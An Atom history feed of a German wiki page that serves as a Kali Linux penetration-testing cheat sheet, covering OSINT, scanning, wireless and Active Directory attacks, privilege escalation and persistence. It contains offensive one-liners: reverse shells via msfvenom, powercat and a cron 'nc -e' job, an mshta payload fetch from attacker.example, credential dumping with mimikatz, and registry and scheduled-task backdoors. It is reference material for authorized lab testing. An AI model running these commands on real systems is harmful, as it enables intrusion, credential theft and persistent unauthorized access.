<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="de">
	<id>https://www.xinux.net/index.php?action=history&amp;feed=atom&amp;title=Kali_100_Tools</id>
	<title>Kali 100 Tools - Versionsgeschichte</title>
	<link rel="self" type="application/atom+xml" href="https://www.xinux.net/index.php?action=history&amp;feed=atom&amp;title=Kali_100_Tools"/>
	<link rel="alternate" type="text/html" href="https://www.xinux.net/index.php?title=Kali_100_Tools&amp;action=history"/>
	<updated>2026-09-21T06:53:27Z</updated>
	<subtitle>Versionsgeschichte dieser Seite in Xinux Wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://www.xinux.net/index.php?title=Kali_100_Tools&amp;diff=73411&amp;oldid=prev</id>
		<title>Thomas.will: Die Seite wurde neu angelegt: „'''Kali-Linux-Werkzeuge - Kurzreferenz (Teil 4)'''  Nachschlagewerk zu haeufig genutzten Werkzeugen aus dem Bereich Penetration Testing. Alle Beispiele sind au…“</title>
		<link rel="alternate" type="text/html" href="https://www.xinux.net/index.php?title=Kali_100_Tools&amp;diff=73411&amp;oldid=prev"/>
		<updated>2026-09-19T17:13:14Z</updated>

		<summary type="html">&lt;p&gt;Die Seite wurde neu angelegt: „&amp;#039;&amp;#039;&amp;#039;Kali-Linux-Werkzeuge - Kurzreferenz (Teil 4)&amp;#039;&amp;#039;&amp;#039;  Nachschlagewerk zu haeufig genutzten Werkzeugen aus dem Bereich Penetration Testing. Alle Beispiele sind au…“&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Neue Seite&lt;/b&gt;&lt;/p&gt;&lt;div&gt;'''Kali-Linux-Werkzeuge - Kurzreferenz (Teil 4)'''&lt;br /&gt;
&lt;br /&gt;
Nachschlagewerk zu haeufig genutzten Werkzeugen aus dem Bereich Penetration Testing. Alle Beispiele sind ausschliesslich fuer autorisierte Test- und Laborumgebungen (Uebungsnetz) gedacht.&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
== Reconnaissance und OSINT ==&lt;br /&gt;
&lt;br /&gt;
;Sammelt E-Mail-Adressen, Subdomains und Hostnamen aus oeffentlichen Quellen&lt;br /&gt;
*theHarvester -d target.com -b all&lt;br /&gt;
&lt;br /&gt;
;Modulares OSINT-Framework mit Metasploit-aehnlicher Konsole&lt;br /&gt;
*recon-ng&lt;br /&gt;
&lt;br /&gt;
;Umfassende Subdomain-Enumeration&lt;br /&gt;
*amass enum -d domain.com&lt;br /&gt;
&lt;br /&gt;
;DNS-Enumeration mit Records, Subdomains und Zonentransfer-Versuch&lt;br /&gt;
*dnsenum target.com&lt;br /&gt;
&lt;br /&gt;
;Grafische Oberflaeche zur OSINT-Analyse und Verknuepfung von Datenpunkten&lt;br /&gt;
*maltego&lt;br /&gt;
&lt;br /&gt;
;Informationsbeschaffung zu einer Telefonnummer&lt;br /&gt;
*phoneinfoga scan -n +491234567&lt;br /&gt;
&lt;br /&gt;
;Prueft die Existenz eines Benutzernamens auf vielen Plattformen&lt;br /&gt;
*socialscan username&lt;br /&gt;
&lt;br /&gt;
;Prueft, auf welchen Diensten eine E-Mail-Adresse registriert ist&lt;br /&gt;
*holehe -e user@example.com&lt;br /&gt;
&lt;br /&gt;
;Durchsucht GitHub nach versehentlich veroeffentlichten Daten&lt;br /&gt;
*github-dorks -d &amp;lt;dork&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Scrapt Daten von X (Twitter)&lt;br /&gt;
*twint -u &amp;lt;username&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Netzwerk-Enumeration ==&lt;br /&gt;
&lt;br /&gt;
;Findet aktive Hosts per ARP im lokalen Netz&lt;br /&gt;
*netdiscover -r 192.168.1.0/24&lt;br /&gt;
&lt;br /&gt;
;Zeigt die lokale ARP-Tabelle mit bekannten Nachbarn&lt;br /&gt;
*arp -a&lt;br /&gt;
&lt;br /&gt;
;Sendet ARP-Anfragen an einen Host&lt;br /&gt;
*arping -c 5 &amp;lt;IP&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Sehr schneller Portscan grosser Portbereiche&lt;br /&gt;
*masscan -p1-65535 --rate 10000 &amp;lt;IP&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Schneller Scan aller 65535 TCP-Ports&lt;br /&gt;
*nmap -p- --min-rate=1000 -T4 &amp;lt;IP&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Detailscan mit Standardskripten und Versionserkennung&lt;br /&gt;
*nmap -sC -sV -p 80,443 &amp;lt;IP&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Einfacher Portscan mit Netcat&lt;br /&gt;
*nc -w 5 -zv &amp;lt;IP&amp;gt; 22-1000&lt;br /&gt;
&lt;br /&gt;
;Prueft auf DNS-Zonentransfer&lt;br /&gt;
*dnsrecon -d target.com -t axfr&lt;br /&gt;
&lt;br /&gt;
== Web Exploitation ==&lt;br /&gt;
&lt;br /&gt;
;Erkennt die auf einer Website eingesetzten Technologien&lt;br /&gt;
*whatweb http://target.com&lt;br /&gt;
&lt;br /&gt;
;Scannt Webserver auf bekannte Schwachstellen und Fehlkonfigurationen&lt;br /&gt;
*nikto -h http://target.com&lt;br /&gt;
&lt;br /&gt;
;Fuzzing versteckter Verzeichnisse und Dateien&lt;br /&gt;
*ffuf -w wordlist.txt -u http://target.com/FUZZ&lt;br /&gt;
&lt;br /&gt;
;Automatisierte SQL-Injection, listet Datenbanken auf&lt;br /&gt;
*sqlmap -u &amp;quot;http://target.com/page.php?id=1&amp;quot; --dbs&lt;br /&gt;
&lt;br /&gt;
;Erkennt XSS-Schwachstellen&lt;br /&gt;
*xsstrike -u &amp;quot;http://target.com/search.php?q=test&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Wireless und Bluetooth ==&lt;br /&gt;
&lt;br /&gt;
;Sucht erreichbare Bluetooth-Geraete&lt;br /&gt;
*hcitool scan&lt;br /&gt;
&lt;br /&gt;
;Ping an ein Bluetooth-Geraet&lt;br /&gt;
*l2ping -c 5 &amp;lt;device_MAC&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Scannt nach Bluetooth-Geraeten in der Umgebung&lt;br /&gt;
*btscanner&lt;br /&gt;
&lt;br /&gt;
;Aktiviert das Bluetooth-Interface&lt;br /&gt;
*hciconfig hci0 up&lt;br /&gt;
&lt;br /&gt;
;Setzt die WLAN-Sendeleistung (regulatorisch begrenzt)&lt;br /&gt;
*iwconfig wlan0 txpower 30&lt;br /&gt;
&lt;br /&gt;
;Zeichnet WPA-Handshakes bzw. PMKID auf&lt;br /&gt;
*hcxdumptool -o capture.pcapng -i wlan0mon&lt;br /&gt;
&lt;br /&gt;
;Bruteforce eines aufgezeichneten WPA-Handshakes&lt;br /&gt;
*aircrack-ng -b &amp;lt;BSSID&amp;gt; -w wordlist.txt handshake.cap&lt;br /&gt;
&lt;br /&gt;
;Framework fuer MITM-Angriffe im WLAN&lt;br /&gt;
*bettercap -iface wlan0&lt;br /&gt;
&lt;br /&gt;
;Sendet Deauthentifizierungs-Pakete an ein Netz&lt;br /&gt;
*aireplay-ng -0 10 -a &amp;lt;BSSID&amp;gt; wlan0mon&lt;br /&gt;
&lt;br /&gt;
;Deauthentifiziert alle Clients (Denial of Service)&lt;br /&gt;
*mdk4 wlan0mon d&lt;br /&gt;
&lt;br /&gt;
== Windows, SMB und Active Directory ==&lt;br /&gt;
&lt;br /&gt;
;Verbindet sich als Gast mit einer SMB-Freigabe&lt;br /&gt;
*smbclient -U &amp;quot;guest&amp;quot; //&amp;lt;target_IP&amp;gt;/share&lt;br /&gt;
&lt;br /&gt;
;Listet erreichbare SMB-Freigaben und Rechte&lt;br /&gt;
*smbmap -H &amp;lt;target_IP&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Enumeriert SMB-Freigaben, Benutzer und Gruppen&lt;br /&gt;
*enum4linux -a &amp;lt;target_IP&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;SMB-Enumeration und Test von Zugangsdaten&lt;br /&gt;
*crackmapexec smb &amp;lt;IP&amp;gt; -u user -p password&lt;br /&gt;
&lt;br /&gt;
;Verbindet sich mit dem RPC-Dienst fuer Benutzer- und Gruppenabfragen&lt;br /&gt;
*rpcclient -U &amp;quot;Administrator&amp;quot; &amp;lt;target_IP&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Listet Domaenenbenutzer&lt;br /&gt;
*net user /domain&lt;br /&gt;
&lt;br /&gt;
;Findet die Domaenencontroller&lt;br /&gt;
*nltest /dclist:domain.com&lt;br /&gt;
&lt;br /&gt;
;Sammelt AD-Enumerationsdaten fuer BloodHound&lt;br /&gt;
*bloodhound-python -c All -d domain.com -u user -p pass&lt;br /&gt;
&lt;br /&gt;
;Extrahiert Windows-Passworthashes (Impacket)&lt;br /&gt;
*secretsdump.py &amp;lt;user&amp;gt;@&amp;lt;target_IP&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Fuehrt Befehle remote per WMI aus (Impacket)&lt;br /&gt;
*wmiexec.py &amp;lt;domain&amp;gt;/&amp;lt;user&amp;gt;:&amp;lt;password&amp;gt;@&amp;lt;target&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Liest Windows-Anmeldedaten aus dem Speicher&lt;br /&gt;
*mimikatz &amp;quot;privilege::debug&amp;quot; &amp;quot;sekurlsa::logonpasswords&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;Fordert SPN-Tickets zum Offline-Cracken an (Kerberoasting)&lt;br /&gt;
*kerberoast -u &amp;lt;user&amp;gt; -p &amp;lt;password&amp;gt; -d &amp;lt;domain&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cloud-Pentesting ==&lt;br /&gt;
&lt;br /&gt;
;Richtet die AWS-CLI mit Zugangsdaten und Region ein&lt;br /&gt;
*aws configure&lt;br /&gt;
&lt;br /&gt;
;Zeigt die aktuelle AWS-Identitaet&lt;br /&gt;
*aws sts get-caller-identity&lt;br /&gt;
&lt;br /&gt;
;Listet die IAM-Benutzer&lt;br /&gt;
*aws iam list-users&lt;br /&gt;
&lt;br /&gt;
;Listet erreichbare S3-Buckets&lt;br /&gt;
*aws s3 ls&lt;br /&gt;
&lt;br /&gt;
;Listet gespeicherte Secrets&lt;br /&gt;
*aws secretsmanager list-secrets&lt;br /&gt;
&lt;br /&gt;
;Sucht oeffentliche Cloud-Ressourcen ueber AWS, Azure und GCP&lt;br /&gt;
*cloud_enum -k &amp;lt;keyword&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Prueft die Berechtigungen eines S3-Buckets&lt;br /&gt;
*s3scanner -b &amp;lt;bucket_name&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Sucht in Repositories nach versehentlich veroeffentlichten Secrets&lt;br /&gt;
*trufflehog --regex --entropy=True --max_depth=10 https://github.com/repo.git&lt;br /&gt;
&lt;br /&gt;
;Zeigt aktive Google-Cloud-Anmeldungen&lt;br /&gt;
*gcloud auth list&lt;br /&gt;
&lt;br /&gt;
;Meldet an der Azure-CLI an&lt;br /&gt;
*az login&lt;br /&gt;
&lt;br /&gt;
== Privilege Escalation (Linux) ==&lt;br /&gt;
&lt;br /&gt;
;Zeigt, welche Befehle der Benutzer per sudo ausfuehren darf&lt;br /&gt;
*sudo -l&lt;br /&gt;
&lt;br /&gt;
;Findet SUID-Binaries&lt;br /&gt;
*find / -perm -4000 -type f 2&amp;gt;/dev/null&lt;br /&gt;
&lt;br /&gt;
;Findet Dateien mit gesetzten Capabilities&lt;br /&gt;
*getcap -r / 2&amp;gt;/dev/null&lt;br /&gt;
&lt;br /&gt;
;Zeigt die Capabilities des aktuellen Prozesses&lt;br /&gt;
*capsh --print&lt;br /&gt;
&lt;br /&gt;
;Prueft die secure_path-Konfiguration von sudo&lt;br /&gt;
*strings /usr/bin/sudo | grep secure_path&lt;br /&gt;
&lt;br /&gt;
;Zeigt als root laufende Prozesse&lt;br /&gt;
*ps aux | grep root&lt;br /&gt;
&lt;br /&gt;
;Zeigt die Kernel-Version als Ausgangspunkt fuer die Suche nach bekannten Luecken&lt;br /&gt;
*uname -a&lt;br /&gt;
&lt;br /&gt;
;Identifiziert die Distribution&lt;br /&gt;
*cat /etc/issue&lt;br /&gt;
&lt;br /&gt;
;Nutzt fehlkonfigurierte Python-Capabilities zur Rechteausweitung&lt;br /&gt;
*python3 -c 'import os; os.setuid(0); os.system(&amp;quot;/bin/bash&amp;quot;)'&lt;br /&gt;
&lt;br /&gt;
;Fuehrt ein Skript mit root-Rechten aus, wenn sudo fuer python freigegeben ist&lt;br /&gt;
*echo 'import os; os.system(&amp;quot;/bin/bash&amp;quot;)' &amp;gt; /tmp/script.py &amp;amp;&amp;amp; sudo python3 /tmp/script.py&lt;br /&gt;
&lt;br /&gt;
== Post-Exploitation und Persistenz ==&lt;br /&gt;
&lt;br /&gt;
;Erzeugt eine Windows-Reverse-Shell-Payload&lt;br /&gt;
*msfvenom -p windows/shell_reverse_tcp LHOST=&amp;lt;IP&amp;gt; LPORT=4444 -f exe &amp;gt; shell.exe&lt;br /&gt;
&lt;br /&gt;
;Legt eine geplante Aufgabe als Persistenz an (Windows)&lt;br /&gt;
*schtasks /create /tn &amp;quot;Backdoor&amp;quot; /tr &amp;quot;...&amp;quot; /sc onstart /ru system&lt;br /&gt;
&lt;br /&gt;
;Traegt ein Programm in den Autostart der Registry ein&lt;br /&gt;
*reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d &amp;quot;C:\path\to\file.exe&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;Aendert die Dateiberechtigungen unter Windows&lt;br /&gt;
*icacls C:\Users\Public\file.exe /grant Everyone:F&lt;br /&gt;
&lt;br /&gt;
;Fuehrt einen Befehl per WMIC aus&lt;br /&gt;
*wmic process call create &amp;quot;...&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;Fuehrt eine HTA-Payload aus&lt;br /&gt;
*mshta &amp;quot;http://attacker.example/payload.hta&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;Reverse Shell ueber PowerShell&lt;br /&gt;
*powercat -c &amp;lt;IP&amp;gt; -p 4444 -e cmd&lt;br /&gt;
&lt;br /&gt;
;Legt eine SUID-Shell an (setzt root-Rechte voraus)&lt;br /&gt;
*cp /bin/bash /tmp/bash &amp;amp;&amp;amp; chmod +s /tmp/bash&lt;br /&gt;
&lt;br /&gt;
;Reverse Shell per Cronjob&lt;br /&gt;
*echo '*/5 * * * * nc -e /bin/sh &amp;lt;IP&amp;gt; 4444' | crontab -&lt;br /&gt;
&lt;br /&gt;
;Aktiviert Persistenz in Meterpreter&lt;br /&gt;
*persistence -U -i 30 -p 4444 -r&lt;br /&gt;
&lt;br /&gt;
== Social Engineering und Phishing ==&lt;br /&gt;
&lt;br /&gt;
;Startet das Social-Engineering Toolkit (SET)&lt;br /&gt;
*setoolkit&lt;br /&gt;
&lt;br /&gt;
;Automatisiert Phishing-Kampagnen anhand fertiger Vorlagen&lt;br /&gt;
*zphisher&lt;br /&gt;
&lt;br /&gt;
== Forensik und Steganografie ==&lt;br /&gt;
&lt;br /&gt;
;Zeigt und bearbeitet Metadaten von Dateien&lt;br /&gt;
*exiftool image.jpg&lt;br /&gt;
&lt;br /&gt;
;Erkennt und extrahiert eingebettete Daten aus Dateien&lt;br /&gt;
*binwalk -e image.png&lt;br /&gt;
&lt;br /&gt;
;Extrahiert lesbaren Text aus Binaerdateien&lt;br /&gt;
*strings file.bin&lt;br /&gt;
&lt;br /&gt;
;File Carving zur Wiederherstellung geloeschter Dateien&lt;br /&gt;
*foremost -i disk.img -o output/&lt;br /&gt;
&lt;br /&gt;
;Stellt geloeschte Dateien von einem Datentraeger wieder her&lt;br /&gt;
*photorec /dev/sdb&lt;br /&gt;
&lt;br /&gt;
;Erstellt effizient ein Abbild eines Datentraegers&lt;br /&gt;
*bmaptool copy /dev/sda image.img&lt;br /&gt;
&lt;br /&gt;
;Extrahiert Artefakte wie E-Mails und URLs aus einem Abbild&lt;br /&gt;
*bulk_extractor -o output/ disk.img&lt;br /&gt;
&lt;br /&gt;
;Analysiert Windows-Speicherabbilder&lt;br /&gt;
*volatility -f memory.img --profile=Win10 pslist&lt;br /&gt;
&lt;br /&gt;
;Analysiert Steganografie in PNG- und BMP-Dateien&lt;br /&gt;
*zsteg image.png&lt;br /&gt;
&lt;br /&gt;
;Erkennt Steganografie in JPEGs&lt;br /&gt;
*stegdetect -s image.jpg&lt;br /&gt;
&lt;br /&gt;
== Sonstige nuetzliche Werkzeuge ==&lt;br /&gt;
&lt;br /&gt;
;Interaktiver Prozess- und Ressourcenmonitor als Alternative zu top&lt;br /&gt;
*htop&lt;br /&gt;
&lt;br /&gt;
;Terminal-Multiplexer fuer mehrere Sessions und Fenster&lt;br /&gt;
*tmux&lt;br /&gt;
&lt;br /&gt;
;Grafischer Netzwerk-Sniffer und Analyzer&lt;br /&gt;
*wireshark&lt;br /&gt;
&lt;br /&gt;
;Leitet den Verkehr eines Programms ueber Proxys bzw. Tor&lt;br /&gt;
*proxychains firefox&lt;br /&gt;
&lt;br /&gt;
;Installiert die Impacket-Bibliothek mit Werkzeugen fuer Windows-Protokolle&lt;br /&gt;
*pip install impacket&lt;br /&gt;
&lt;br /&gt;
;Aktiviert IP-Forwarding, etwa fuer MITM-Szenarien&lt;br /&gt;
*echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
&lt;br /&gt;
;Oeffnet ein Terminal und fuehrt einen Befehl aus&lt;br /&gt;
*gnome-terminal -- bash -c 'befehl; exec bash'&lt;br /&gt;
&lt;br /&gt;
;Beendet die aktuelle Shell-Sitzung&lt;br /&gt;
*exit&lt;/div&gt;</summary>
		<author><name>Thomas.will</name></author>
	</entry>
</feed>